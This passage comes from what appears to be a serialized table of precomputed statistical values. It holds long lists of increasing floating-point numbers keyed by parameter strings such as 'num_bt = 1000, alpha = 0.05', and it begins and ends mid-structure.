0.4722632751464908, 0.47326123046875646, 0.4742593688964908, 0.4752575073242251, 0.47625576782227197, 0.4772540893554751, 0.47825247192383447, 0.47925097656250637, 0.48024954223633454, 0.48124822998047523, 0.4822469787597722, 0.4832457885742253, 0.48424465942383466, 0.48524365234375655, 0.4862427062988347, 0.4872418212890691, 0.48824105834961606, 0.48924035644531916, 0.4902397155761785, 0.4912391967773504, 0.49223873901367854, 0.4932384033203192, 0.4942380676269599, 0.49523785400391296, 0.49623776245117857, 0.4972376708984442, 0.4982377014160223, 0.49923785400391296, 0.5002380065918036, 0.5012382812500068, 0.5022386779785225, 0.5032390747070382, 0.5042395935058663, 0.505240234375007, 0.5062408752441475, 0.5072416381836006, 0.5082425231933662, 0.5092434082031317, 0.5102444152832099, 0.5112454833984442, 0.5122466735839911, 0.5132479248046943, 0.5142492370605537, 0.5152506713867255, 0.5162521667480537, 0.5172537231445381, 0.5182554016113349, 0.5192571411132879, 0.5202589416503972, 0.521260864257819, 0.5222628479003971, 0.5232648925781315, 0.5242670593261783, 0.5252692871093815, 0.5262715759277409, 0.5272739868164127, 0.5282764587402409, 0.5292790527343815, 0.530281646728522, 0.531284362792975, 0.5322872009277405, 0.5332901000976623, 0.5342930603027404, 0.5352960815429747, 0.5362992248535216, 0.5373024291992247, 0.5383057556152403, 0.5393091430664122, 0.5403125915527404, 0.541316162109381, 0.542319793701178, 0.5433234863281312, 0.544327301025397, 0.5453311767578188, 0.546335113525397, 0.5473391723632876, 0.5483432922363344, 0.5493475341796937, 0.5503517761230531, 0.5513562011718812, 0.5523606262207094, 0.55336517333985, 0.5543698425293032, 0.5553745117187564, 0.5563793029785221, 0.5573842163086004, 0.5583891906738349, 0.5593942260742256, 0.5603993225097726, 0.5614045410156322, 0.5624098815918042, 0.563415222167976, 0.5644207458496165, 0.5654262695312572, 0.5664319152832104, 0.5674376220703198, 0.5684434509277417, 0.56944934082032, 0.5704552917480544, 0.5714613647461014, 0.5724674987793047, 0.5734737548828205, 0.5744800720214924, 0.5754864501953205, 0.576492950439461, 0.5774995727539142, 0.5785061950683673, 0.579512939453133, 0.5805198059082112, 0.5815267333984456, 0.5825337219238363, 0.5835408325195396, 0.5845480041503991, 0.5855552368164149, 0.586562591552743, 0.5875700073242273, 0.5885775451660241, 0.5895851440429772, 0.5905928649902429, 0.5916006469726648, 0.5926085510253992, 0.5936165161132899, 0.5946245422363369, 0.5956326904296964, 0.5966408996582121, 0.5976492309570403, 0.5986576232910245, 0.599666076660165, 0.6006746520996181, 0.6016833496093837, 0.6026921081543056, 0.6037009277343838, 0.6047098693847744, 0.6057188720703214, 0.6067279968261808, 0.6077371826171966, 0.6087464904785247, 0.6097558593750089, 0.6107653503418057, 0.6117749023437588, 0.6127845764160244, 0.6137943115234462, 0.6148041076660243, 0.615814025878915, 0.6168240661621182, 0.6178341674804776, 0.6188443298339933, 0.6198546142578214, 0.6208650207519618, 0.6218754882812586, 0.6228860168457117, 0.6238966674804772, 0.6249074401855553, 0.6259182739257897, 0.6269291687011803, 0.6279401855468835, 0.6289513244628991, 0.629962524414071, 0.6309738464355553, 0.6319852294921958, 0.6329966735839926, 0.6340083007812581, 0.6350199279785237, 0.636031738281258, 0.6370436096191486, 0.6380555419921955, 0.6390675964355549, 0.6400797119140705, 0.6410919494628986, 0.6421043090820392, 0.6431167297363359, 0.6441292724609452, 0.6451418762207107, 0.6461546020507888, 0.6471674499511794, 0.6481803588867262, 0.6491933288574293, 0.6502064208984449, 0.651219635009773, 0.6522329711914135, 0.6532463684082103, 0.6542598266601632, 0.6552734069824288, 0.6562871093750068, 0.6573009338378973, 0.6583148193359442, 0.6593288269043035, 0.6603428955078191, 0.6613570861816471, 0.6623713378906314, 0.6633857727050844, 0.6644002075195373, 0.6654148254394591, 0.6664295043945371, 0.6674443054199276, 0.6684591674804744, 0.6694741516113337, 0.6704892578125056, 0.6715044860839899, 0.6725197753906306, 0.6735351867675837, 0.6745506591796931, 0.675566253662115, 0.6765819702148493, 0.6775978088378961, 0.6786137084960991, 0.6796297302246147, 0.6806458740234428, 0.6816621398925834, 0.6826784667968803, 0.6836949157714897, 0.6847114257812553, 0.6857281188964898, 0.6867448730468805, 0.6877617492675837, 0.6887786865234432, 0.6897958068847714, 0.6908129882812556, 0.6918302917480524, 0.6928476562500056, 0.6938652038574274, 0.6948828125000056, 0.6959005432128963, 0.6969183959960995, 0.6979363708496152, 0.6989544067382871, 0.6999726257324276, 0.7009909057617244, 0.7020093078613338, 0.7030278320312556, 0.7040464172363338, 0.7050651855468807, 0.7060840148925839, 0.7071029663085996, 0.7081220397949277, 0.7091412353515684, 0.7101605529785214, 0.711179992675787, 0.7121994934082089, 0.7132191772460995, 0.7142389221191464, 0.7152587890625058, 0.7162787780761777, 0.717298889160162, 0.7183191833496151, 0.7193395385742244, 0.72035995483399, 0.7213805541992243, 0.7224012756347712, 0.7234221191406306, 0.7244430847168024, 0.7254641723632868, 0.7264853210449272, 0.7275066528320365, 0.7285281066894583, 0.7295496826171927, 0.7305713195800833, 0.7315931396484426, 0.7326150817871144, 0.7336371459960987, 0.7346593322753955, 0.7356816406250047, 0.7367040710449265, 0.7377266235351608, 0.7387492980957077, 0.7397721557617233, 0.740795074462895, 0.7418181762695356, 0.7428413391113323, 0.7438646850585978, 0.7448881530761758, 0.7459117431640664, 0.7469355163574257, 0.7479593505859413, 0.7489833679199255, 0.7500074462890659, 0.7510317077636751, 0.7520561523437531, 0.7530806579589874, 0.7541053466796904, 0.755130157470706, 0.756155090332034, 0.7571801452636745, 0.7582053833007837, 0.7592307434082054, 0.7602562255859396, 0.7612818908691427, 0.762307617187502, 0.7633335876464861, 0.7643596191406264, 0.7653858337402356, 0.7664121704101573, 0.7674386901855478, 0.7684653320312508, 0.7694920959472663, 0.7705190429687506, 0.7715461120605475, 0.7725733642578131, 0.7736007385253911, 0.7746282348632817, 0.7756559143066409, 0.776683776855469, 0.7777117614746095, 0.7787398681640626, 0.7797681579589845, 0.7807966308593751, 0.7818252258300783, 0.7828540039062502, 0.7838829040527345, 0.7849119873046876, 0.7859411926269532, 0.7869705810546875, 0.7880001525878907, 0.7890299072265625, 0.7900597839355469, 0.7910897827148436, 0.7921200256347655, 0.7931503906249998, 0.794180938720703, 0.7952116699218748, 0.7962425231933591, 0.7972735595703121, 0.7983047790527339, 0.7993361816406245, 0.8003677673339838, 0.8013994750976556, 0.8024314270019525, 0.8034635009765617, 0.8044957580566398, 0.8055281982421866, 0.8065608215332022, 0.8075936279296864, 0.8086266174316393, 0.8096597900390611, 0.8106932067871079, 0.8117267456054672, 0.8127604675292952, 0.813794372558592, 0.8148285217285137, 0.815862792968748, 0.8168973083496073, 0.8179320068359354, 0.8189668884277322, 0.8200019531249979, 0.8210372619628884, 0.8220726928710914, 0.8231084289550757, 0.8241442871093726, 0.8251803894042945, 0.8262166748046852, 0.8272532043457009, 0.8282899169921852, 0.8293268127441383, 0.8303639526367165, 0.8314012756347634, 0.8324388427734353, 0.8334766540527322, 0.8345146484374978, 0.8355528869628884, 0.8365913085937479, 0.8376299743652321, 0.8386688842773414, 0.8397080383300758, 0.8407473754882789, 0.841786956787107, 0.8428267822265602, 0.8438668518066382, 0.8449071655273414, 0.8459476623535132, 0.8469884643554663, 0.8480295104980443, 0.8490707397460912, 0.8501122741699192, 0.8511540527343723, 0.8521960754394503, 0.8532384033203096, 0.8542809143066378, 0.8553237304687472, 0.8563667907714815, 0.8574101562499971, 0.8584537658691377, 0.8594976196289034, 0.8605417785644504, 0.8615862426757785, 0.8626309509277316, 0.863675964355466, 0.8647212219238255, 0.8657667846679661, 0.866812652587888, 0.8678588256835912, 0.8689053039550755, 0.8699520874023411, 0.8709991149902317, 0.8720465087890599, 0.8730942077636693, 0.8741422119140599, 0.8751905212402318, 0.8762391967773412, 0.8772881774902318, 0.8783374633789036, 0.879387115478513, 0.8804371337890599, 0.881487457275388, 0.8825381469726538, 0.8835892028808568, 0.8846405639648413, 0.8856922912597632, 0.886744445800779, 0.887796905517576, 0.8888497924804667, 0.8899030456542949, 0.8909566650390605, 0.89201071166992, 0.8930651245117168, 0.8941199645996075, 0.8951751708984357, 0.8962308654785137, 0.8972869262695294, 0.8983434143066388, 0.899400329589842, 0.900457733154295, 0.9015155639648419, 0.9025738220214824, 0.903632568359373, 0.9046917419433572, 0.9057514648437478, 0.906811614990232, 0.9078722534179663, 0.9089334411621067, 0.9099951171874973, 0.9110572814941379, 0.9121199951171847, 0.9131832580566378, 0.9142470703124973, 0.9153114318847629, 0.9163763427734348, 0.9174418640136691, 0.9185079345703097, 0.9195746765136691, 0.9206419677734347, 0.9217098693847627, 0.9227784423828097, 0.9238476867675752, 0.9249175415039033, 0.9259881286621064, 0.9270593872070282, 0.9281313781738249, 0.9292041015624966, 0.9302774963378871, 0.9313517456054652, 0.9324267272949184, 0.9335025024414026, 0.9345790710449183, 0.9356565551757777, 0.9367348327636683, 0.9378140258789026, 0.9388941345214806, 0.9399751586914024, 0.941057098388668, 0.9421400756835899, 0.9432240905761681, 0.9443091430664025, 0.9453952331542931, 0.9464824218749962, 0.9475708312988242, 0.9486603393554648, 0.9497511291503867, 0.95084320068359, 0.9519365539550743, 0.9530312499999961, 0.9541274108886679, 0.9552249755859336, 0.9563241271972618, 0.9574248046874961, 0.9585271301269492, 0.9596312255859335, 0.9607370910644492, 0.9618448486328085, 0.9629546203613241, 0.964066406249996, 0.9651803894042928, 0.9662966308593709, 0.9674153137206989, 0.9685365600585895, 0.969660491943355, 0.9707873535156205, 0.9719172058105424, 0.9730503540039018, 0.9741870422363237, 0.9753275146484331, 0.976472015380855, 0.9776209716796831, 0.9787746887206988, 0.9799337158203082, 0.9810985412597611, 0.9822698364257768, 0.9834483337402299, 0.9846350097656206, 0.9858310241699174, 0.987037719726558, 0.9882571716308547, 0.9894917602539016, 0.9907451477050735, 0.9920223388671828, 0.9933315124511671, 0.9946865234374952, 0.9961158752441358, 0.9977000732421827], 'num_bt = 1000, alpha = 0.05,': [5.1300048828125e-05, 0.00035546875, 0.0008181457519531249, 0.001367431640625, 0.0019721374511718747, 0.002616149902343749, 0.0032897644042968735, 0.003986877441406248, 0.0047030334472656235, 0.005435119628906249, 0.006180877685546875, 0.006938415527343749, 0.007706207275390624, 0.008483215332031249, 0.009268402099609375, 0.010061035156249998, 0.010860321044921874, 0.011665710449218752, 0.012476776123046877, 0.013293029785156254, 0.01411404418945313, 0.014939575195312506, 0.015769256591796878, 0.016602905273437503, 0.017440155029296876, 0.0182808837890625, 0.019124908447265623, 0.01997198486328125, 0.020821990966796877, 0.0216748046875, 0.022530242919921874, 0.02338818359375, 0.024248565673828125, 0.0251112060546875, 0.02597610473632813, 0.02684307861328126, 0.02771206665039063, 0.028583007812500005, 0.029455841064453134, 0.03033050537109376, 0.03120687866210939, 0.03208489990234376, 0.03296456909179689, 0.03384582519531252, 0.0347286071777344, 0.03561279296875002, 0.03649844360351565, 0.03738549804687503, 0.038273895263671906, 0.03916351318359378, 0.04005447387695316, 0.04094659423828129, 0.04183999633789067, 0.04273449707031255, 0.04363015747070318, 0.04452685546875006, 0.04542471313476568, 0.046323608398437556, 0.04722348022460943, 0.048124389648437564, 0.04902621459960944, 0.04992907714843756, 0.0508327941894532, 0.05173748779296882, 0.052643035888671946, 0.053549438476562565, 0.05445669555664069, 0.05536480712890631, 0.05627371215820319, 0.05718347167968756, 0.05809396362304694, 0.05900524902343756, 0.05991732788085944, 0.06083007812500007, 0.06174356079101569, 0.06265783691406254, 0.06357272338867193, 0.06448834228515629, 0.06540463256835943, 0.0663215942382813, 0.06723916625976567, 0.0681574096679688, 0.06907632446289066, 0.06999578857421879, 0.07091592407226566, 0.0718366088867188, 0.07275790405273444, 0.07367980957031256, 0.07460226440429693, 0.07552526855468755, 0.07644888305664069, 0.07737298583984381, 0.07829763793945319, 0.07922283935546881, 0.08014852905273445, 0.08107476806640634, 0.08200155639648449, 0.08292877197265636, 0.08385653686523448, 0.08478479003906261, 0.08571347045898448, 0.08664270019531259, 0.08757235717773446, 0.08850244140625008, 0.08943307495117195, 0.09036407470703131, 0.09129556274414069, 0.09222747802734382, 0.09315982055664071, 0.09409265136718759, 0.09502584838867195, 0.09595947265625007, 0.09689352416992195, 0.09782800292968757, 0.0987628479003907, 0.09969812011718757, 0.1006338195800782, 0.10156982421875008, 0.10250631713867195, 0.10344311523437508, 0.10438034057617196, 0.10531793212890633, 0.10625588989257823, 0.10719415283203138, 0.10813284301757825, 0.10907189941406262, 0.1100113220214845, 0.11095104980468765, 0.11189114379882828, 0.1128316040039064, 0.11377243041992202, 0.11471350097656266, 0.11565499877929702, 0.11659680175781265, 0.11753890991210952, 0.11848138427734389, 0.11942416381835952, 0.1203672485351564, 0.12131063842773454, 0.12225439453125017, 0.12319839477539082, 0.12414276123046897, 0.1250874328613284, 0.12603234863281282, 0.1269776306152347, 0.12792315673828158, 0.12886904907226598, 0.12981518554687538, 0.13076162719726603, 0.13170831298828167, 0.13265536499023484, 0.133602661132813, 0.13455020141601615, 0.13549804687500056, 0.13644619750976617, 0.13739459228515677, 0.13834323120117237, 0.13929223632812548, 0.1402414245605474, 0.14119091796875055, 0.1421406555175787, 0.14309063720703186, 0.14404092407226626, 0.14499145507812566, 0.14594223022461006, 0.14689324951171945, 0.14784451293945383, 0.14879608154296942, 0.1497478332519538, 0.15069989013671942, 0.15165219116211004, 0.15260467529296945, 0.15355746459961006, 0.15451043701171946, 0.15546371459961006, 0.15641717529296945, 0.15737088012695383, 0.1583248291015632, 0.15927902221679757, 0.160233459472657, 0.16118807983398514, 0.1621429443359383, 0.16309805297851643, 0.16405340576171956, 0.16500894165039143, 0.1659647216796883, 0.16692068481445393, 0.16787689208984458, 0.1688333435058602, 0.16978997802734463, 0.1707467956542978, 0.1717039184570322, 0.17266116333007908, 0.17361865234375096, 0.17457638549804783, 0.17553430175781348, 0.17649240112304787, 0.1774507446289073, 0.17840927124023548, 0.17936804199218864, 0.18032699584961054, 0.18128613281250117, 0.18224545288086058, 0.183205017089845, 0.18416476440429813, 0.18512469482422, 0.1860848083496106, 0.1870451660156262, 0.1880057067871106, 0.1889664306640637, 0.18992733764648562, 0.19088842773437625, 0.19184976196289188, 0.19281121826172004, 0.1937729187011732, 0.1947347412109388, 0.19569680786132942, 0.19665905761718883, 0.19762149047851696, 0.19858404541015756, 0.19954684448242316, 0.20050982666015754, 0.20147299194336066, 0.20243627929687624, 0.20339981079101682, 0.20436346435546993, 0.20532736206054802, 0.20629138183593865, 0.20725558471679806, 0.20822003173828246, 0.20918460083007934, 0.21014929199218874, 0.21111422729492313, 0.21207928466797, 0.21304458618164185, 0.21401000976562623, 0.21497561645507934, 0.21594134521484498, 0.21690731811523561, 0.21787341308593877, 0.21883969116211066, 0.21980609130859508, 0.22077267456054822, 0.2217394409179701, 0.2227063903808607, 0.22367346191406384, 0.2246407165527357, 0.2256081542968763, 0.22657571411132943, 0.22754345703125134, 0.22851138305664198, 0.22947943115234515, 0.23044766235351705, 0.23141601562500147, 0.23238455200195463, 0.2333532714843765, 0.23432211303711092, 0.2352910766601578, 0.23626028442382968, 0.23722955322265782, 0.23819906616211095, 0.23916864013672035, 0.24013845825195473, 0.24110833740234539, 0.24207846069336103, 0.24304864501953294, 0.24401901245117358, 0.244989562988283, 0.2459602355957049, 0.24693109130859553, 0.24790206909179868, 0.2488731689453143, 0.24984445190429871, 0.25081585693359565, 0.25178744506836126, 0.2527591552734394, 0.25373098754883006, 0.2547030029296894, 0.25567514038086125, 0.2566474609375019, 0.2576198425292988, 0.25859246826172066, 0.2595651550292988, 0.2605380249023457, 0.261511016845705, 0.2624841918945331, 0.26345742797851746, 0.2644308471679705, 0.2654044494628923, 0.2663781738281267, 0.2673519592285173, 0.26832598876953284, 0.26930007934570466, 0.27027435302734526, 0.2712487487792984, 0.27222326660156404, 0.27319796752929837, 0.27417272949218896, 0.27514767456054834, 0.27612274169922024, 0.27709799194336093, 0.2780733032226579, 0.2790487976074235, 0.28002441406250167, 0.28100015258789235, 0.2819760742187517, 0.2829520568847673, 0.2839282226562517, 0.28490451049804866, 0.285880920410158, 0.28685745239257987, 0.28783410644531426, 0.28881094360351733, 0.28978784179687667, 0.2907649230957048, 0.29174212646484543, 0.2927194519042985, 0.29369689941406407, 0.2946744689941422, 0.2956521606445328, 0.29662997436523586, 0.2976079711914077, 0.2985860290527358, 0.2995642700195327, 0.3005426330566421, 0.301521118164064, 0.3024996643066421, 0.303478393554689, 0.30445724487304837, 0.3054362182617203, 0.30641531372070474, 0.3073945312500017, 0.3083738708496111, 0.30935339355468927, 0.3103329772949237, 0.31131268310547067, 0.31229251098633004, 0.3132725219726582, 0.3142525939941426, 0.3152327880859396, 0.31621310424804894, 0.3171936035156271, 0.3181741638183615, 0.31915484619140844, 0.3201356506347678, 0.3211166381835959, 0.3220976867675803, 0.32307885742187725, 0.3240601501464866, 0.32504156494140846, 0.32602310180664285, 0.32700476074218976, 0.3279865417480491, 0.32896844482422094, 0.3299504699707053, 0.3309326171875022, 0.33191488647461165, 0.33289721679687734, 0.3338797302246117, 0.3348623657226586, 0.33584506225586175, 0.3368278808593774, 0.3378108825683619, 0.3387939453125026, 0.33977713012695576, 0.34076043701172143, 0.3417438659667996, 0.34272741699219034, 0.34371109008789347, 0.34469482421875286, 0.34567874145508104, 0.3466627197265655, 0.34764682006836245, 0.3486311035156281, 0.34961544799805, 0.35059991455078443, 0.3515844421386751, 0.3525691528320345, 0.3535539855957064, 0.35453887939453455, 0.3555238952636752, 0.3565090332031283, 0.35749429321289394, 0.3584796752929721, 0.35946517944336276, 0.3604507446289097, 0.3614364929199253, 0.36242230224609717, 0.36340823364258157, 0.3643942871093785, 0.36538046264648794, 0.36636669921875364, 0.36735311889648803, 0.3683395996093787, 0.36932620239258185, 0.37031292724609755, 0.3712997131347695, 0.37228668212891025, 0.37327371215820726, 0.3742608642578167, 0.37524813842773863, 0.3762355346679731, 0.37722299194336384, 0.37821063232422325, 0.3791983337402389, 0.3801861572265671, 0.38117410278320785, 0.38216210937500483, 0.38315023803711423, 0.3841385498046924, 0.3851268615722706, 0.3861153564453176, 0.38710397338867697, 0.3880926513671926, 0.3890814514160208, 0.3900703735351615, 0.39105935668945846, 0.3920485229492241, 0.393037750244146, 0.3940270996093804, 0.3950165100097711, 0.3960061035156305, 0.3969957580566461, 0.39798553466797426, 0.39897543334961494, 0.3999653930664119, 0.40095547485352123, 0.4019456787109431, 0.4029360046386775, 0.40392645263672444, 0.4049169616699275, 0.4059075927734431, 0.40689834594727126, 0.40788916015625565, 0.4088801574707087, 0.40987121582031805, 0.41086233520508364, 0.411853637695318, 0.41284500122070866, 0.4138364868164117, 0.4148280944824273, 0.41581976318359914, 0.4168115539550835, 0.4178034667968804, 0.4187955017089898, 0.4197875976562555, 0.42077987670898986, 0.4217721557617242, 0.42276461791992737, 0.4237571411132868, 0.4247497863769587, 0.42574255371094316, 0.42673544311524014, 0.4277283935546933, 0.42872146606445893, 0.4297146606445371, 0.43070791625977156, 0.43170129394531853, 0.4326947937011779, 0.43368835449219356, 0.434682098388678, 0.4356759033203187, 0.43666976928711565, 0.4376638183593813, 0.4386579284668032, 0.4396521606445376, 0.4406464538574283, 0.44164093017578765, 0.4426354675293033, 0.44363006591797516, 0.44462484741211583, 0.44561968994141277, 0.4466146545410221, 0.4476096801757877, 0.44860482788086586, 0.4496000976562565, 0.4505954895019596, 0.45159094238281894, 0.4525865173339908, 0.4535822143554752, 0.4545780334472721, 0.45557391357422516, 0.45656991577149075, 0.4575659790039126, 0.45856222534180324, 0.45955853271485014, 0.4605549011230532, 0.46155145263672503, 0.46254806518555314, 0.46354479980469376, 0.46454159545899065, 0.4655385742187562, 0.4665355529785218, 0.46753271484375614, 0.46852993774414675, 0.4695272827148498, 0.47052474975586533, 0.4715223388671934, 0.47251998901367775, 0.4735177612304746, 0.47451559448242775, 0.4755135498046934, 0.47651162719727147, 0.47750982666016206, 0.4785080871582089, 0.4795064697265683, 0.4805049743652402, 0.48150354003906837, 0.4825022888183653, 0.4835010375976623, 0.4844999694824279, 0.4854989624023498, 0.4864980773925842, 0.48749731445313116, 0.48849661254883425, 0.48949603271484987, 0.490495574951178, 0.4914951782226624, 0.4924949645996155, 0.4934947509765686, 0.49449472045899046, 0.4954947509765686, 0.49649490356445924, 0.4974951782226623, 0.49849551391602165, 0.49949603271484977, 0.5004965515136779, 0.5014972534179748, 0.5024980163574279, 0.5034989013671934, 0.5044999084472716, 0.5055009765625059, 0.5065021667480528, 0.5075034790039122, 0.5085048522949279, 0.5095064086914122, 0.5105080261230527, 0.5115097045898495, 0.512511566162115, 0.5135134887695368, 0.5145154724121149, 0.5155176391601618, 0.5165198669433649, 0.5175222167968806, 0.5185246887207087, 0.519527221679693, 0.5205298767089898, 0.521532653808599, 0.5225355529785208, 0.5235385131835989, 0.5245415954589895, 0.5255447998046926, 0.526548065185552, 0.5275514526367239, 0.5285549621582083, 0.5295585937500052, 0.5305622863769585, 0.5315661010742242, 0.5325700378418023, 0.533574096679693, 0.5345782165527398, 0.5355824584960992, 0.5365868225097711, 0.5375913085937555, 0.5385958557128961, 0.5396005249023493, 0.540605316162115, 0.541610168457037, 0.5426152038574278, 0.5436203002929748, 0.5446255187988344, 0.5456307983398502, 0.5466361999511784, 0.5476417236328189, 0.5486473693847721, 0.5496531372070378, 0.5506589660644597, 0.5516649169921942, 0.5526709899902412, 0.5536771850586008, 0.5546834411621165, 0.5556898193359447, 0.5566963195800853, 0.5577029418945384, 0.5587096252441478, 0.559716491699226, 0.5607234191894604, 0.5617304077148512, 0.5627375793457107, 0.5637448120117264, 0.5647522277832108, 0.5657597045898514, 0.5667672424316482, 0.5677749633789139, 0.5687827453613358, 0.5697906494140702, 0.5707986755371172, 0.5718068237304766, 0.5728150329589924, 0.5738234252929767, 0.5748318786621173, 0.5758404541015704, 0.576849151611336, 0.5778579101562579, 0.5788668518066485, 0.5798758544921955, 0.5808849792480549, 0.5818942260742268, 0.5829035339355548, 0.5839130249023515, 0.5849225769043046, 0.5859322509765702, 0.5869420471191483, 0.587951965332039, 0.5889620056152421, 0.5899721679687578, 0.5909823913574297, 0.5919927368164138, 0.5930032043457106, 0.59401379394532, 0.5950245056152418, 0.5960353393554761, 0.5970462341308668, 0.5980573120117262, 0.5990684509277419, 0.60007971191407, 0.6010910949707106, 0.6021026000976636, 0.6031142272949291, 0.604125915527351, 0.6051377868652416, 0.6061497192382884, 0.6071618347168041, 0.6081740112304759, 0.6091863098144602, 0.610198730468757, 0.6112112731933662, 0.612223937988288, 0.6132366638183661, 0.6142495727539129, 0.6152626037597723, 0.6162756958007879, 0.6172889709472721, 0.6183023071289125, 0.6193157653808655, 0.6203294067382873, 0.6213431091308653, 0.6223569335937559, 0.623370880126959, 0.6243849487304746, 0.6253991394043026, 0.6264134521484431, 0.6274278869628961, 0.6284424438476616, 0.6294571228027396, 0.6304719238281301, 0.6314867858886769, 0.6325018310546925, 0.6335169982910206, 0.6345322875976612, 0.6355476989746144, 0.6365631713867238, 0.6375788269043019, 0.6385946044921925, 0.6396105041503956, 0.6406265258789111, 0.6416426086425829, 0.6426588745117235, 0.6436752624511767, 0.6446917724609423, 0.6457084045410205, 0.6467251586914112, 0.6477420349121145, 0.6487590942382864, 0.6497762145996144, 0.6507934570312549, 0.6518108825683643, 0.6528283691406299, 0.6538459777832081, 0.654863769531255, 0.6558816833496145, 0.6568997192382864, 0.6579178161621144, 0.6589361572265674, 0.6599545593261767, 0.6609730834960986, 0.661991729736333, 0.6630105590820362, 0.6640294494628957, 0.6650485229492238, 0.6660677185058644, 0.6670870361328175, 0.6681064758300831, 0.6691260986328175, 0.6701457824707081, 0.6711656494140675, 0.6721856384277394, 0.6732057495117237, 0.6742259826660205, 0.6752463989257861, 0.6762669372558642, 0.6772875366210985, 0.6783083801269579, 0.6793292846679736, 0.6803503112793017, 0.6813715209960985, 0.6823928527832078, 0.6834143676757859, 0.6844359436035202, 0.6854577026367233, 0.686479583740239, 0.6875016479492232, 0.6885237731933637, 0.6895460815429729, 0.690568572998051, 0.6915911254882853, 0.6926138610839884, 0.693636718750004, 0.6946597595214882, 0.6956829223632849, 0.6967062072753941, 0.6977296142578159, 0.6987532043457064, 0.6997769775390658, 0.7008008117675814, 0.7018248291015655, 0.7028490295410185, 0.7038733520507839, 0.7048977966308619, 0.7059224243164087, 0.706947174072268, 0.7079720458984398, 0.7089971008300803, 0.7100223388671895, 0.7110476989746112, 0.7120731811523454, 0.7130988464355484, 0.714124633789064, 0.7151506042480481, 0.7161766967773447, 0.7172029724121102, 0.7182293701171881, 0.7192559509277349, 0.7202827148437504, 0.7213096008300784, 0.722336608886719, 0.7233638000488284, 0.7243911743164064, 0.725418670654297, 0.7264463500976562, 0.7274742126464843, 0.7285021972656248, 0.7295303649902342, 0.730558654785156, 0.7315871276855467, 0.7326157836914061, 0.733644561767578, 0.7346735229492186, 0.7357026672363279, 0.736731994628906, 0.7377614440917967, 0.7387910766601561, 0.7398208923339842, 0.7408508300781248, 0.7418809509277341, 0.7429112548828122, 0.743941741943359, 0.7449724121093747, 0.7460032043457028, 0.7470341796874996, 0.7480653381347652, 0.7490966796874995, 0.7501282043457026, 0.7511599121093744, 0.752191802978515, 0.7532238159179679, 0.754256072998046, 0.7552884521484365, 0.7563210144042959, 0.7573538208007801, 0.7583867492675768, 0.7594198608398423, 0.7604532165527328, 0.7614866943359359, 0.7625203552246076, 0.7635542602539044, 0.7645882873535136, 0.7656225585937478, 0.7666569519042946, 0.7676915893554664, 0.7687264099121071, 0.7697614135742165, 0.7707966613769507, 0.7718320312499974, 0.7728676452636692, 0.7739034423828098, 0.7749394226074192, 0.7759755859374974, 0.7770119934082006, 0.7780485839843725, 0.7790853576660132, 0.7801223754882788, 0.7811595153808569, 0.7821969604492164, 0.7832345275878883, 0.7842723999023414, 0.785310394287107, 0.7863486328124977, 0.7873870544433571, 0.7884257202148414, 0.7894646301269507, 0.7905037231445288, 0.7915429992675757, 0.7925825195312475, 0.7936222839355443, 0.7946622314453099, 0.7957024230957005, 0.7967428588867161, 0.7977834777832004, 0.7988243408203096, 0.7998654479980439, 0.800906738281247, 0.8019482727050751, 0.8029901123046844, 0.8040320739746062, 0.8050743408203093, 0.8061168518066374, 0.8071595458984343, 0.8082025451660124, 0.8092457275390593, 0.8102892150878874, 0.8113328857421843, 0.8123768615722625, 0.8134210205078095, 0.8144654846191377, 0.8155101928710907, 0.8165551452636689, 0.8176003417968721, 0.8186458435058565, 0.8196915283203096, 0.820737518310544, 0.8217838134765597, 0.822830291748044, 0.8238770751953096, 0.8249241638183565, 0.8259714965820284, 0.8270190734863253, 0.8280669555664034, 0.8291151428222628, 0.8301635742187471, 0.8312123107910127, 0.8322612915039033, 0.8333106384277313, 0.8343602294921845, 0.8354100646972625, 0.8364602661132782, 0.8375107727050751, 0.838561523437497, 0.8396125793457002, 0.8406640014648409, 0.8417156677246066, 0.8427677001953099, 0.8438200378417943, 0.84487268066406, 0.845925628662107, 0.8469788818359352, 0.8480325012207007, 0.8490864257812477, 0.850140716552732, 0.8511953124999977, 0.8522502746582009, 0.8533055419921852, 0.8543611755371071, 0.8554171752929666, 0.8564734802246071, 0.8575302124023415, 0.8585872497558572, 0.8596446533203103, 0.8607024230957009, 0.8617606201171851, 0.8628191223144507, 0.8638780517578101, 0.8649373474121068, 0.8659970092773411, 0.8670570983886692, 0.8681175537109348, 0.8691784362792941, 0.8702396850585908, 0.8713013610839814, 0.8723634643554657, 0.8734259948730438, 0.8744889526367157, 0.8755523376464812, 0.8766161499023407, 0.8776803894042938, 0.8787450561523408, 0.8798102111816376, 0.8808758544921845, 0.8819419250488251, 0.8830084838867157, 0.8840754699707, 0.8851430053710906, 0.8862109680175748, 0.8872794799804654, 0.8883484802246059, 0.8894179687499965, 0.8904880065917932, 0.89155853271484, 0.8926296081542929, 0.8937012329101522, 0.8947733459472614, 0.8958460693359331, 0.8969194030761675, 0.8979932250976518, 0.8990676574706985, 0.9001427001953078, 0.9012183532714797, 0.9022945556640579, 0.9033714294433547, 0.9044489135742141, 0.9055270690917921, 0.9066058349609326, 0.9076853332519482, 0.9087654418945262, 0.9098462829589792, 0.910927795410151, 0.9120100402831978, 0.9130929565429634, 0.9141766662597602, 0.9152611694335884, 0.9163464050292917, 0.9174323730468698, 0.9185191955566353, 0.9196068725585883, 0.9206953430175725, 0.9217846679687444, 0.9228748474121037, 0.9239659423828069, 0.9250579528808539, 0.9261508789062446, 0.927244720458979, 0.9283395996093696, 0.9294354553222602, 0.9305323486328071, 0.9316302795410102, 0.9327292480468697, 0.933829376220698, 0.9349306030273384, 0.9360329895019478, 0.9371365966796822, 0.9382414245605416, 0.9393475341796821, 0.9404549255371039, 0.9415635986328069, 0.9426737365722601, 0.943785278320307, 0.9448982849121038, 0.946012817382807, 0.9471288757324162, 0.9482465820312442, 0.9493659973144474, 0.9504871215820254, 0.9516100769042911, 0.9527348632812441, 0.9538616638183534, 0.954990478515619, 0.9561213684081972, 0.9572545166015566, 0.958389923095697, 0.9595277709960878, 0.9606681213378846, 0.9618111572265564, 0.9629569396972596, 0.9641056518554628, 0.9652574768066347, 0.966412597656244, 0.9675711364746035, 0.9687333984374941, 0.9698995056152283, 0.9710698852539001, 0.9722447204589783, 0.9734243774414001, 0.9746092224121033, 0.9757997436523377, 0.9769964294433534, 0.9781998901367127, 0.9794107360839782, 0.9806298217773376, 0.9818581237792906, 0.9830968017578062, 0.9843474426269468, 0.9856117553710874, 0.9868923034667906, 0.988192199707025, 0.9895158996581969, 0.9908700561523373, 0.9922647399902279, 0.9937177124023372, 0.9952649841308528, 0.9970087280273371], 'num_bt = 1000, 